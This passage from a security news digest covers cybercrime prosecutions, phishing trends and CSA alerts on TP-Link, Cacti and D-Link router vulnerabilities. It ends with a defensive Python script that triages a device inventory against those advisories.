        https://www.bleepingcomputer.com/news/security/us-govt-sanctions-cybercrime-gang-behind-massive-911-s5-proxy-botnet-linked-to-illegitimate-residential-proxy-service/
        https://home.treasury.gov/news/press-releases/jy2375
        https://therecord.media/us-sanctions-chinese-botnet-proxy
        https://www.bankinfosecurity.com/us-sanctions-chinese-national-for-running-911-s5-botnet-a-25340

      • Russian Indicted For Selling Access To US Corporate Networks
        "A 31-year-old Russian national named Evgeniy Doroshenko has been indicted for wire and computer fraud in the United States for allegedly acting as an "initial access broker" from February 2019 to May 2024. An initial access broker (IAB) is a threat actor who breaches corporate networks and then sells that access to other threat actors, who commonly use the access to conduct data theft or ransomware attacks."
        https://www.bleepingcomputer.com/news/security/russian-indicted-for-selling-access-to-us-corporate-networks/

      • From Phish To Phish Phishing: How Email Scams Got Smart
        "If only things were this easy. There’s never been a time where phishing was good, but there was certainly a time where phishing seemed quaint. Back in the 1990s, and even up until the last few years, phishing as a concept was marked more by comical errors than it was by pure evil. We’ve seen them all. The ALL CAPS subject lines. The grammar, or lack thereof. The horrible spoof jobs. You may have gotten these emails in the 1990s. You may have gotten these emails in the last few months."
        https://blog.checkpoint.com/security/from-phish-to-phish-phishing-how-email-scams-got-smart/

      • The SEC's New Take On Cybersecurity Risk Management
        "The advent of generative AI is surfacing new risks, significantly raising the stakes for businesses around the globe and for marketplace stability. In reaction to the logarithmic growth of cybercrime, the guidance and regulatory landscape is changing rapidly. While historically, the United States preferred frameworks over regulation, in 2023 there was a significant regulatory development: the introduction of new cybersecurity rules by the Securities and Exchange Commission (SEC)."
        https://www.darkreading.com/cyberattacks-data-breaches/secs-new-take-on-cybersecurity-risk-management

      • Social Distortion: The Threat Of Fear, Uncertainty And Deception In Creating Security Risk
"In offensive security, there are a range of organization-specific vulnerabilities that create risk, from software/hardware vulnerabilities, to processes and people. Attackers target and prey on any weakness they can identify. While Red Teams can expose and root out organization-specific weaknesses, there is another growing class of vulnerability at an industry level. It’s not a single actor, vulnerability or intentionally malicious campaign. It manifests from governmental requirements and policy interference, to overblown, sometimes false alarms about technology safety, to active efforts to undermine research or authoritative industry voices."
        https://www.securityweek.com/social-distortion-the-threat-of-fear-uncertainty-and-deception-in-creating-security-risk/

      • Indian National Pleads Guilty To Wire Fraud Conspiracy For Stealing Over $37 Million By Spoofing Coinbase's Website
        "Chirag Tomar, 30, a citizen of the Republic of India, appeared before U.S. Magistrate Judge Susan C. Rodriguez today and pleaded guilty to federal charges for stealing more than $37 million through a spoofing scheme of the Coinbase website, announced Dena J. King, U.S. Attorney for the Western District of North Carolina. Tomar was arrested at the Atlanta airport on Dec. 20, 2023, upon entering the United States, and remains in federal custody."
        https://www.justice.gov/usao-wdnc/pr/indian-national-pleads-guilty-wire-fraud-conspiracy-stealing-over-37-million-spoofing
        https://www.bleepingcomputer.com/news/security/indian-man-stole-37-million-in-crypto-using-fake-coinbase-pro-site/
        https://thehackernews.com/2024/05/indian-national-pleads-guilty-to-37.html

Reference
Electronic Transactions Development Agency (ETDA)

Posted in Cyber Security News
NCSA_THAICERT
• Critical Vulnerability in TP-Link Archer C5400X Gaming Router

  The Cyber Security Agency of Singapore (CSA) has published an alert that TP-Link has released a security update to address a critical vulnerability, CVE-2024-5035, affecting the Archer C5400X gaming router. The vulnerability has a CVSSv4 score of 10.

  Successful exploitation could allow an unauthenticated remote attacker to execute commands on an affected device with elevated privileges.

  The vulnerability affects firmware version 1_1.1.6 and earlier.

  Users and administrators are advised to update the product to the latest version immediately.

  Reference
  https://www.csa.gov.sg/alerts-advisories/alerts/2024/al-2024-062

  You can follow the news on the webboard or on Facebook NCSA Thailand.

  Posted in Cyber Security News
  NCSA_THAICERT
• Critical Vulnerabilities in Cacti

  The Cyber Security Agency of Singapore (CSA) has published an alert that Cacti has released security updates to address critical vulnerabilities in its product.

  The vulnerabilities are as follows:

  • CVE-2024-29895: Successful exploitation could allow an unauthenticated attacker to achieve remote code execution. CVSS score: 10
  • CVE-2024-25641: Successful exploitation could allow an authenticated attacker with the "Import Templates" permission to write arbitrary files or execute malicious PHP code on the affected server. CVSS score: 9.1
  • CVE-2024-34340: Successful exploitation could allow an attacker to bypass authentication and gain access to the affected server. CVSS score: 9.1

  The critical vulnerabilities affect Cacti versions before 1.2.27.

  Users and administrators of affected product versions are advised to update to the latest version immediately.

  Reference
  https://www.csa.gov.sg/alerts-advisories/alerts/2024/al-2024-063

  You can follow the news on the webboard or on Facebook NCSA Thailand.

  Posted in Cyber Security News
  NCSA_THAICERT
• Sav-Rx Discloses Data Breach Affecting 2.8 Million People in the United States

  You can follow the news on the webboard or on Facebook NCSA Thailand.

  Posted in Cyber Security News
  NCSA_THAICERT
• High-Severity Vulnerability Affects Cisco Firepower Management Center

  You can follow the news on the webboard or on Facebook NCSA Thailand.

  Posted in Cyber Security News
  NCSA_THAICERT
• RE: Data backup

  @NCSA_THAICER What does it include?

  Posted in Community of Practice
  lalita_P12
• Indian Man Steals $37 Million in Cryptocurrency Using a Fake Website Impersonating Coinbase Pro

  You can follow the news on the webboard or on Facebook NCSA Thailand.

  Posted in Cyber Security News
  NCSA_THAICERT
• Beware of Fake Antivirus Websites Spreading Malware That Targets Android and Windows

  You can follow the news on the webboard or on Facebook NCSA Thailand.

  Posted in Cyber Security News
  NCSA_THAICERT
• Exploitation of Vulnerabilities in D-Link Routers

  The Cyber Security Agency of Singapore (CSA) has published an alert that there are reports of exploitation of vulnerabilities affecting D-Link DIR-600 and DIR-605 routers.

  The vulnerabilities are as follows:

  • CVE-2014-100005: Successful exploitation of this cross-site request forgery (CSRF) vulnerability could allow an attacker to hijack an existing administrator session and change the router configuration.
  • CVE-2021-40655: Successful exploitation of this information disclosure vulnerability could allow an attacker to obtain login credentials by forging a POST request to the configuration page of an affected router.

  The vulnerabilities affect the following products:

  • DIR-600
  • DIR-605
  • DIR-605L

  The affected D-Link products have reached end of life (EOL). Users and administrators of affected EOL products should retire the devices and replace them with products that are supported by the manufacturer.

  Reference
  https://www.csa.gov.sg/alerts-advisories/alerts/2024/al-2024-058

  You can follow the news on the webboard or on Facebook NCSA Thailand.

  Posted in Cyber Security News
  NCSA_THAICERT
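The three CSA alerts above (TP-Link Archer C5400X firmware 1_1.1.6 and earlier, Cacti before 1.2.27, and the EOL D-Link DIR-600/DIR-605/DIR-605L) all reduce to the same practitioner question: which assets in my inventory match, and is the answer "update" or "replace"? The script below is an added example, not code from the NCSA posts, CSA or any vendor. It encodes only what the alerts state; the inventory rows are constructed samples, and it assumes that a TP-Link version string such as "1_1.1.6" is hardware revision "1" plus firmware "1.1.6", so the text before the last underscore is dropped before comparing.

```python
"""Inventory triage for CSA alerts AL-2024-062, AL-2024-063 and AL-2024-058.

Added example, not code from the NCSA posts, CSA or any vendor. The rules
encode only what the alerts state; INVENTORY is a constructed sample.
Assumption: in a TP-Link string like "1_1.1.6" the part before the last "_"
is the hardware revision and is dropped before comparison.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional, Tuple

Version = Tuple[int, ...]


def parse_version(s: str) -> Version:
    """Turn "1_1.1.6", "1.1.6 Build 20230520 rel.55695" or "1.2.27" into an int tuple.

    Text before the last "_" (TP-Link hardware revision, see assumption above) is
    discarded and parsing stops at the first non-numeric token, so build/rel
    suffixes never take part in the comparison.
    """
    core = s.strip().rsplit("_", 1)[-1]
    parts = []
    for tok in re.split(r"[.\s]+", core):
        if not tok.isdigit():
            break
        parts.append(int(tok))
    if not parts:
        raise ValueError(f"unparseable version string: {s!r}")
    return tuple(parts)


@dataclass(frozen=True)
class Rule:
    vendor: str
    products: frozenset
    cves: tuple
    action: str
    reference: str
    fixed_in: Optional[Version] = None       # "versions before X are affected"
    last_affected: Optional[Version] = None  # "X and earlier are affected"

    def is_affected(self, version: Optional[Version]) -> bool:
        if version is None:
            return True                      # unknown version: assume affected
        if self.fixed_in is not None:
            return version < self.fixed_in
        if self.last_affected is not None:
            return version <= self.last_affected
        return True                          # no fixed version exists (EOL)


ADVISORIES = (
    Rule("TP-Link", frozenset({"Archer C5400X"}), ("CVE-2024-5035",),
         "update firmware",
         "https://www.csa.gov.sg/alerts-advisories/alerts/2024/al-2024-062",
         last_affected=parse_version("1_1.1.6")),
    Rule("Cacti", frozenset({"Cacti"}),
         ("CVE-2024-29895", "CVE-2024-25641", "CVE-2024-34340"),
         "update to 1.2.27 or later",
         "https://www.csa.gov.sg/alerts-advisories/alerts/2024/al-2024-063",
         fixed_in=parse_version("1.2.27")),
    Rule("D-Link", frozenset({"DIR-600", "DIR-605", "DIR-605L"}),
         ("CVE-2014-100005", "CVE-2021-40655"),
         "replace device (EOL, no fix)",
         "https://www.csa.gov.sg/alerts-advisories/alerts/2024/al-2024-058"),
)

# Constructed sample inventory; hostnames and version strings are made up.
INVENTORY = [
    {"host": "edge-rtr-01", "vendor": "TP-Link", "product": "Archer C5400X", "version": "1_1.1.6"},
    {"host": "edge-rtr-02", "vendor": "TP-Link", "product": "Archer C5400X", "version": "1.1.7 Build 20240101"},
    {"host": "noc-cacti", "vendor": "Cacti", "product": "Cacti", "version": "1.2.26"},
    {"host": "lab-cacti", "vendor": "Cacti", "product": "Cacti", "version": "1.2.27"},
    {"host": "branch-rtr", "vendor": "D-Link", "product": "DIR-605L", "version": "2.13"},
    {"host": "guest-rtr", "vendor": "D-Link", "product": "DIR-600", "version": None},
]


def triage(inventory, rules=ADVISORIES):
    """Return one finding per (asset, rule) pair where the rule says the asset is affected."""
    findings = []
    for asset in inventory:
        for rule in rules:
            if asset["vendor"].casefold() != rule.vendor.casefold():
                continue
            if asset["product"] not in rule.products:
                continue
            raw = asset.get("version")
            version = parse_version(raw) if raw else None
            if rule.is_affected(version):
                findings.append({
                    "host": asset["host"], "product": asset["product"], "version": raw,
                    "cves": rule.cves, "action": rule.action, "reference": rule.reference,
                })
    return findings


if __name__ == "__main__":
    for f in triage(INVENTORY):
        print(f'{f["host"]:<12} {f["product"]:<14} {str(f["version"]):<22} '
              f'{", ".join(f["cves"])} -> {f["action"]}')
```

Two design points matter in practice: an asset with no recorded version is treated as affected rather than skipped, so gaps in the inventory surface as work items instead of silently passing; and the EOL rule carries no version bound at all, because the D-Link alert offers no fixed firmware, only replacement.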